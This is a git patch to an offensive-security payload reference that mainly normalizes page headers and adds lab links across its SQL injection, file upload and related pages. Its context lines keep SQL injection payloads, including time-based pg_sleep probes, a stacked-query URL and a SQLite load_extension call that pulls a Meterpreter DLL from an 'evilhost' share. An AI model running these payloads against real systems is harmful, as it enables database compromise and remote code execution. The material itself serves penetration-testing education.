From 48a4e5c95b625eff19e5fa349230f3392d4e16f0 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 10 Nov 2024 20:49:52 +0100 Subject: [PATCH] Normalize page header for SQLi, Upload, Cache Deception --- SQL Injection/BigQuery Injection.md | 6 +++- SQL Injection/DB2 Injection.md | 1 + SQL Injection/HQL Injection.md | 2 +- SQL Injection/MSSQL Injection.md | 3 ++ SQL Injection/MySQL Injection.md | 3 ++ SQL Injection/OracleSQL Injection.md | 3 ++ SQL Injection/PostgreSQL Injection.md | 47 ++++++++++++------------ SQL Injection/README.md | 28 ++++++++++----- SQL Injection/SQLite Injection.md | 52 +++++++++++++++------------ SQL Injection/SQLmap.md | 9 ++--- Tabnabbing/README.md | 4 +-- Type Juggling/README.md | 11 ++++-- Upload Insecure Files/README.md | 13 +++++-- Web Cache Deception/README.md | 6 ++-- 14 files changed, 118 insertions(+), 70 deletions(-) diff --git a/SQL Injection/BigQuery Injection.md b/SQL Injection/BigQuery Injection.md index 8fa44d68..e4f8631a 100644 --- a/SQL Injection/BigQuery Injection.md +++ b/SQL Injection/BigQuery Injection.md @@ -1,4 +1,6 @@ -# Google BigQuery SQL Injection +# Google BigQuery SQL Injection + +> Google BigQuery SQL Injection is a type of security vulnerability where an attacker can execute arbitrary SQL queries on a Google BigQuery database by manipulating user inputs that are incorporated into SQL queries without proper sanitization. This can lead to unauthorized data access, data manipulation, or other malicious activities. ## Summary @@ -10,6 +12,7 @@ * [BigQuery Time Based](#bigquery-time-based) * [References](#references) + ## Detection * Use a classic single quote to trigger an error: `'` @@ -62,6 +65,7 @@ dataset_name.column_name` union all select CAST(@@project_id AS INT64) ORDER BY * Time based functions does not exist in the BigQuery syntax. + ## References * [BigQuery SQL Injection Cheat Sheet - Ozgur Alp - February 14, 2022](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac) diff --git a/SQL Injection/DB2 Injection.md b/SQL Injection/DB2 Injection.md index 47a5fc37..75e94846 100644 --- a/SQL Injection/DB2 Injection.md +++ b/SQL Injection/DB2 Injection.md @@ -2,6 +2,7 @@ > IBM DB2 is a family of relational database management systems (RDBMS) developed by IBM. Originally created in the 1980s for mainframes, DB2 has evolved to support various platforms and workloads, including distributed systems, cloud environments, and hybrid deployments. + ## Summary * [DB2 Cheatsheet](#db2-cheatsheet) diff --git a/SQL Injection/HQL Injection.md b/SQL Injection/HQL Injection.md index 802957e7..7798b8f7 100644 --- a/SQL Injection/HQL Injection.md +++ b/SQL Injection/HQL Injection.md @@ -2,6 +2,7 @@ > Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia + ## Summary * [HQL Comments](#hql-comments) @@ -15,7 +16,6 @@ * [Methods by DBMS](#methods-by-dbms) * [References](#references) -:warning: Your input will always be between the percentage symbols: `%INJECT_HERE%` ## HQL Comments diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index 4f6b853b..a17643ea 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -1,5 +1,8 @@ # MSSQL Injection +> MSSQL Injection is a type of security vulnerability that can occur when an attacker can insert or "inject" malicious SQL code into a query executed by a Microsoft SQL Server (MSSQL) database. This typically happens when user inputs are directly included in SQL queries without proper sanitization or parameterization. SQL Injection can lead to serious consequences such as unauthorized data access, data manipulation, and even gaining control over the database server. + + ## Summary * [MSSQL Default Databases](#mssql-default-databases) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 83a262c4..bf870400 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -1,5 +1,8 @@ # MySQL Injection +> MySQL Injection is a type of security vulnerability that occurs when an attacker is able to manipulate the SQL queries made to a MySQL database by injecting malicious input. This vulnerability is often the result of improperly handling user input, allowing attackers to execute arbitrary SQL code that can compromise the database's integrity and security. + + ## Summary * [MYSQL Default Databases](#mysql-default-databases) diff --git a/SQL Injection/OracleSQL Injection.md b/SQL Injection/OracleSQL Injection.md index 4f0ebff5..ecebeb13 100644 --- a/SQL Injection/OracleSQL Injection.md +++ b/SQL Injection/OracleSQL Injection.md @@ -1,5 +1,8 @@ # Oracle SQL Injection +> Oracle SQL Injection is a type of security vulnerability that arises when attackers can insert or "inject" malicious SQL code into SQL queries executed by Oracle Database. This can occur when user inputs are not properly sanitized or parameterized, allowing attackers to manipulate the query logic. This can lead to unauthorized access, data manipulation, and other severe security implications. + + ## Summary * [Oracle SQL Default Databases](#oracle-sql-default-databases) diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index 466d4da3..9db90e22 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -1,9 +1,12 @@ -# PostgreSQL injection +# PostgreSQL Injection + +> + ## Summary * [PostgreSQL Comments](#postgresql-comments) -* [PostgreSQL version](#postgresql-version) +* [PostgreSQL Version](#postgresql-version) * [PostgreSQL Current User](#postgresql-current-user) * [PostgreSQL List Users](#postgresql-list-users) * [PostgreSQL List Password Hashes](#postgresql-list-password-hashes) @@ -11,22 +14,23 @@ * [PostgreSQL List Privileges](#postgresql-list-privileges) * [PostgreSQL Check if Current User is Superuser](#postgresql-check-if-current-user-is-superuser) * [PostgreSQL database name](#postgresql-database-name) -* [PostgreSQL List databases](#postgresql-list-database) -* [PostgreSQL List tables](#postgresql-list-tables) -* [PostgreSQL List columns](#postgresql-list-columns) +* [PoStgresql List Databases](#postgresql-list-database) +* [PostgreSQL List Tables](#postgresql-list-tables) +* [PostgreSQL List Columns](#postgresql-list-columns) * [PostgreSQL Error Based](#postgresql-error-based) * [PostgreSQL XML Helpers](#postgresql-xml-helpers) * [PostgreSQL Blind](#postgresql-blind) * [PostgreSQL Time Based](#postgresql-time-based) -* [PostgreSQL Stacked query](#postgresql-stacked-query) +* [PostgreSQL Stacked Query](#postgresql-stacked-query) * [PostgreSQL File Read](#postgresql-file-read) * [PostgreSQL File Write](#postgresql-file-write) -* [PostgreSQL Command execution](#postgresql-command-execution) +* [PostgreSQL Command Execution](#postgresql-command-execution) * [CVE-2019–9193](#cve-20199193) * [Using libc.so.6](#using-libcso6) * [Bypass Filter](#bypass-filter) * [References](#references) + ## PostgreSQL Comments ```sql @@ -34,15 +38,6 @@ /**/ ``` -## PostgreSQL chain injection points symbols -```sql -; #Used to terminate a SQL command. The only place it can be used within a statement is within a string constant or quoted identifier. -|| #or statement - -# usage examples: -/?whatever=1;(select 1 from pg_sleep(5)) -/?whatever=1||(select 1 from pg_sleep(5)) -``` ## PostgreSQL Version @@ -136,7 +131,7 @@ SELECT column_name FROM information_schema.columns WHERE table_name='data_table' ' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1 ``` -## PostgreSQL XML helpers +## PostgreSQL XML Helpers ```sql select query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row @@ -151,6 +146,7 @@ select database_to_xmlschema(true,true,''); -- dump the current db to an XML sch Note, with the above queries, the output needs to be assembled in memory. For larger databases, this might cause a slow down or denial of service condition. + ## PostgreSQL Blind ```sql @@ -160,7 +156,7 @@ Note, with the above queries, the output needs to be assembled in memory. For la ## PostgreSQL Time Based -#### Identify time based +#### Identify Time Based ```sql select 1 from pg_sleep(5) @@ -168,16 +164,20 @@ select 1 from pg_sleep(5) ||(select 1 from pg_sleep(5)) ``` -#### Database dump time based +#### Database Dump Time Based + ```sql select case when substring(datname,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from pg_database limit 1 ``` -#### Table dump time based +#### Table Dump Time Based + ```sql select case when substring(table_name,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from information_schema.tables limit 1 ``` -#### columns dump time based + +#### Columns Dump Time Based + ```sql select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name limit 1 select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name where column_name='value' limit 1 @@ -191,12 +191,13 @@ AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ## PostgreSQL Stacked Query -Use a semi-colon ";" to add another query +Use a semi-colon "`;`" to add another query ```sql http://host/vuln.php?id=injection';create table NotSoSecure (data varchar(200));-- ``` + ## PostgreSQL File Read ```sql @@ -238,7 +239,7 @@ SELECT lo_put(43210, 20, 'some other data'); -- append data to a large object at SELECT lo_export(43210, '/tmp/testexport'); -- export data to /tmp/testexport ``` -## PostgreSQL Command execution +## PostgreSQL Command Execution ### CVE-2019–9193 diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 422d78ea..172201be 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -1,13 +1,7 @@ # SQL Injection -> A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. +> SQL Injection (SQLi) is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. SQL Injection is one of the most common and severe types of web application vulnerabilities, enabling attackers to execute arbitrary SQL code on the database. This can lead to unauthorized data access, data manipulation, and, in some cases, full compromise of the database server. -Attempting to manipulate SQL queries may have goals including: - -- Information Leakage -- Disclosure of stored data -- Manipulation of stored data -- Bypassing authorization controls ## Summary @@ -21,7 +15,8 @@ Attempting to manipulate SQL queries may have goals including: * [HQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/HQL%20Injection.md) * [DB2 Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/DB2%20Injection.md) * [SQLmap](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLmap%20Cheatsheet.md) -* [Entry point detection](#entry-point-detection) +* [Tools](#tools) +* [Entry Point Detection](#entry-point-detection) * [DBMS Identification](#dbms-identification) * [Authentication bypass](#authentication-bypass) * [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1) @@ -33,6 +28,8 @@ Attempting to manipulate SQL queries may have goals including: * [No Comma Allowed](#no-comma-allowed) * [No Equal Allowed](#no-equal-allowed) * [Case modification](#case-modification) +* [Labs](#labs) +* [References](#references) ## Tools @@ -41,7 +38,7 @@ Attempting to manipulate SQL queries may have goals including: * [r0oth3x49/ghauri](https://github.com/r0oth3x49/ghauri) - An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws -## Entry point detection +## Entry Point Detection Detecting the entry point in SQL injection (SQLi) involves identifying locations in an application where user input is not properly sanitized before it is included in SQL queries. @@ -358,6 +355,19 @@ Bypass using LIKE/NOT IN/IN/BETWEEN * [PortSwigger - SQL injection vulnerability allowing login bypass](https://portswigger.net/web-security/sql-injection/lab-login-bypass) * [PortSwigger - SQL injection with filter bypass via XML encoding](https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding) * [PortSwigger - SQL Labs](https://portswigger.net/web-security/all-labs#sql-injection) +* [Root Me - SQL injection - Authentication](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-authentication) +* [Root Me - SQL injection - Authentication - GBK](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-authentication-GBK) +* [Root Me - SQL injection - String](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-String) +* [Root Me - SQL injection - Numeric](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Numeric) +* [Root Me - SQL injection - Routed](https://www.root-me.org/en/Challenges/Web-Server/SQL-Injection-Routed) +* [Root Me - SQL injection - Error](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Error) +* [Root Me - SQL injection - Insert](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Insert) +* [Root Me - SQL injection - File reading](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-File-reading) +* [Root Me - SQL injection - Time based](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Time-based) +* [Root Me - SQL injection - Blind](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Blind) +* [Root Me - SQL injection - Second Order](https://www.root-me.org/en/Challenges/Web-Server/SQL-Injection-Second-Order) +* [Root Me - SQL injection - Filter bypass](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Filter-bypass) +* [Root Me - SQL Truncation](https://www.root-me.org/en/Challenges/Web-Server/SQL-Truncation) ## References diff --git a/SQL Injection/SQLite Injection.md b/SQL Injection/SQLite Injection.md index a786add7..2524f157 100644 --- a/SQL Injection/SQLite Injection.md +++ b/SQL Injection/SQLite Injection.md @@ -1,37 +1,41 @@ # SQLite Injection +> SQLite Injection is a type of security vulnerability that occurs when an attacker can insert or "inject" malicious SQL code into SQL queries executed by an SQLite database. This vulnerability arises when user inputs are integrated into SQL statements without proper sanitization or parameterization, allowing attackers to manipulate the query logic. Such injections can lead to unauthorized data access, data manipulation, and other severe security issues. + + ## Summary -* [SQLite comments](#sqlite-comments) -* [SQLite version](#sqlite-version) -* [String based - Extract database structure](#string-based---extract-database-structure) -* [Integer/String based - Extract table name](#integerstring-based---extract-table-name) -* [Integer/String based - Extract column name](#integerstring-based---extract-column-name) -* [Boolean - Count number of tables](#boolean---count-number-of-tables) -* [Boolean - Enumerating table name](#boolean---enumerating-table-name) -* [Boolean - Extract info](#boolean---extract-info) -* [Boolean - Error based](#boolean---error-based) -* [Time based](#time-based) +* [SQLite Comments](#sqlite-comments) +* [SQLite Version](#sqlite-version) +* [String Based - Extract Database Structure](#string-based---extract-database-structure) +* [Integer/String Based - Extract Table Name](#integerstring-based---extract-table-name) +* [Integer/String Based - Extract Column Name](#integerstring-based---extract-column-name) +* [Boolean - Count Number Of Tables](#boolean---count-number-of-tables) +* [Boolean - Enumerating Table Name](#boolean---enumerating-table-name) +* [Boolean - Extract Info](#boolean---extract-info) +* [Boolean - Error Based](#boolean---error-based) +* [Time Based](#time-based) * [Remote Code Execution](#remote-code-execution) * [Attach Database](#attach-database) * [Load_extension](#load_extension) * [References](#references) -## SQLite comments +## SQLite Comments ```sql -- /**/ ``` -## SQLite version +## SQLite Version ```sql select sqlite_version(); ``` -## String based - Extract database structure + +## String Based - Extract Database Structure ```sql SELECT sql FROM sqlite_schema @@ -40,13 +44,16 @@ if sqlite_version > 3.33.0 ```sql SELECT sql FROM sqlite_master ``` -## Integer/String based - Extract table name + + +## Integer/String Based - Extract Table Name ```sql SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ``` -## Integer/String based - Extract column name + +## Integer/String Based - Extract Column Name ```sql SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name' @@ -64,37 +71,38 @@ Cleaner output SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name'); ``` -## Boolean - Count number of tables + +## Boolean - Count Number Of Tables ```sql and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table ``` -## Boolean - Enumerating table name +## Boolean - Enumerating Table Name ```sql and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number ``` -## Boolean - Extract info +## Boolean - Extract Info ```sql and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char') ``` -## Boolean - Extract info (order by) +### Boolean - Extract Info (order by) ```sql CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) = hex('some_char') THEN ELSE END ``` -## Boolean - Error based +## Boolean - Error Based ```sql AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END ``` -## Time based +## Time Based ```sql AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) @@ -117,7 +125,7 @@ INSERT INTO lol.pwn (dataz) VALUES ("");-- UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');-- ``` -Note: By default this component is disabled +Note: By default this component is disabled. ## References diff --git a/SQL Injection/SQLmap.md b/SQL Injection/SQLmap.md index b80b0bf2..5858b441 100644 --- a/SQL Injection/SQLmap.md +++ b/SQL Injection/SQLmap.md @@ -1,12 +1,13 @@ # SQLmap -SQLmap is a powerful tool that automates the detection and exploitation of SQL injection vulnerabilities, saving time and effort compared to manual testing. It supports a wide range of databases and injection techniques, making it versatile and effective in various scenarios. +> SQLmap is a powerful tool that automates the detection and exploitation of SQL injection vulnerabilities, saving time and effort compared to manual testing. It supports a wide range of databases and injection techniques, making it versatile and effective in various scenarios. -Additionally, SQLmap can retrieve data, manipulate databases, and even execute commands, providing a robust set of features for penetration testers and security analysts. +> Additionally, SQLmap can retrieve data, manipulate databases, and even execute commands, providing a robust set of features for penetration testers and security analysts. -Reinventing the wheel isn't ideal because SQLmap has been rigorously developed, tested, and improved by experts. Using a reliable, community-supported tool means you benefit from established best practices and avoid the high risk of missing vulnerabilities or introducing errors in custom code. +> Reinventing the wheel isn't ideal because SQLmap has been rigorously developed, tested, and improved by experts. Using a reliable, community-supported tool means you benefit from established best practices and avoid the high risk of missing vulnerabilities or introducing errors in custom code. + +>However you should always know how SQLmap is working, and be able to replicate it manually if necessary. -However you should always know how SQLmap is working, and be able to replicate it manually if necessary. ## Summary diff --git a/Tabnabbing/README.md b/Tabnabbing/README.md index 6cdb95ec..68faf85f 100644 --- a/Tabnabbing/README.md +++ b/Tabnabbing/README.md @@ -6,7 +6,7 @@ ## Summary * [Tools](#tools) -* [Description](#description) +* [Methodology](#methodology) * [Exploit](#exploit) * [Discover](#discover) * [References](#references) @@ -17,7 +17,7 @@ - [PortSwigger/discovering-reversetabnabbing](https://portswigger.net/bappstore/80eb8fd46bf847b4b17861482c2f2a30) - Discovering Reverse Tabnabbing -## Description +## Methodology When tabnabbing, the attacker searches for links that are inserted into the website and are under his control. Such links may be contained in a forum post, for example. Once he has found this kind of functionality, it checks that the link's `rel` attribute does not contain the value `noopener` and the target attribute contains the value `_blank`. If this is the case, the website is vulnerable to tabnabbing. diff --git a/Type Juggling/README.md b/Type Juggling/README.md index 61fe3c94..31a9e530 100644 --- a/Type Juggling/README.md +++ b/Type Juggling/README.md @@ -2,6 +2,7 @@ > PHP is a loosely typed language, which means it tries to predict the programmer's intent and automatically converts variables to different types whenever it seems necessary. For example, a string containing only numbers can be treated as an integer or a float. However, this automatic conversion (or type juggling) can lead to unexpected results, especially when comparing variables using the '==' operator, which only checks for value equality (loose comparison), not type and value equality (strict comparison). + ## Summary * [Loose Comparison](#loose-comparison) @@ -9,7 +10,8 @@ * [NULL statements](#null-statements) * [Loose Comparison](#loose-comparison) * [Magic Hashes](#magic-hashes) -* [Exploit](#exploit) +* [Methodology](#methodology) +* [Labs](#labs) * [References](#references) @@ -89,7 +91,7 @@ var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m')); ?> ``` -## Exploit +## Methodology The vulnerability in the following code lies in the use of a loose comparison (!=) to validate the $cookie['hmac'] against the calculated `$hash`. @@ -140,6 +142,11 @@ The exploitation phase is the following: 4. In this case we assumed the key was a null string : `$key = '';` +## Labs + +* [Root Me - PHP - type juggling](https://www.root-me.org/en/Challenges/Web-Server/PHP-type-juggling) + + ## References - [(Super) Magic Hashes - myst404 (@myst404_) - October 7, 2019](https://offsec.almond.consulting/super-magic-hash.html) diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index bfeeacd3..40fe4039 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -2,10 +2,11 @@ > Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code. + ## Summary * [Tools](#tools) -* [Exploits](#exploits) +* [Methodology](#methodology) * [Defaults extensions](#defaults-extensions) * [Upload tricks](#upload-tricks) * [Filename vulnerabilities](#filename-vulnerabilities) @@ -14,6 +15,7 @@ * [Configuration Files](#configuration-files) * [CVE - ImageMagick](#cve---imagemagick) * [CVE - FFMpeg HLS](#cve---ffmpeg-hls) +* [Labs](#labs) * [References](#references) @@ -24,7 +26,7 @@ - [ZAP/FileUpload](https://www.zaproxy.org/blog/2021-08-20-zap-fileupload-addon/) - OWASP ZAP add-on for finding vulnerabilities in File Upload functionality. -## Exploits +## Methodology ![file-upload-mindmap.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/Upload%20Insecure%20Files/Images/file-upload-mindmap.png?raw=true) @@ -290,7 +292,12 @@ More payloads in the folder `CVE FFmpeg HLS/`. ## Labs -* [Portswigger Labs on File Uploads](https://portswigger.net/web-security/all-labs#file-upload-vulnerabilities) +* [PortSwigger - Labs on File Uploads](https://portswigger.net/web-security/all-labs#file-upload-vulnerabilities) +* [Root Me - File upload - Double extensions](https://www.root-me.org/en/Challenges/Web-Server/File-upload-Double-extensions) +* [Root Me - File upload - MIME type](https://www.root-me.org/en/Challenges/Web-Server/File-upload-MIME-type) +* [Root Me - File upload - Null byte](https://www.root-me.org/en/Challenges/Web-Server/File-upload-Null-byte) +* [Root Me - File upload - ZIP](https://www.root-me.org/en/Challenges/Web-Server/File-upload-ZIP) +* [Root Me - File upload - Polyglot](https://www.root-me.org/en/Challenges/Web-Server/File-upload-Polyglot) ## References diff --git a/Web Cache Deception/README.md b/Web Cache Deception/README.md index 30cefae7..8908523e 100644 --- a/Web Cache Deception/README.md +++ b/Web Cache Deception/README.md @@ -6,7 +6,7 @@ ## Summary * [Tools](#tools) -* [Exploit](#exploit) +* [Methodology](#methodology) * [Caching Sensitive Data](#caching-sensitive-data) * [Caching Custom JavaScript](#caching-custom-javascript) * [CloudFlare Caching](#cloudflare-caching) @@ -19,7 +19,7 @@ * [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner) - Web Cache Poisoning Burp Extension -## Exploit +## Methodology Example of Web Cache Deception: @@ -127,7 +127,7 @@ Exceptions and bypasses: ## Labs -* [PortSwigger Labs for Web cache deception](https://portswigger.net/web-security/all-labs#web-cache-poisoning) +* [PortSwigger Labs for Web Cache Deception](https://portswigger.net/web-security/all-labs#web-cache-poisoning) ## References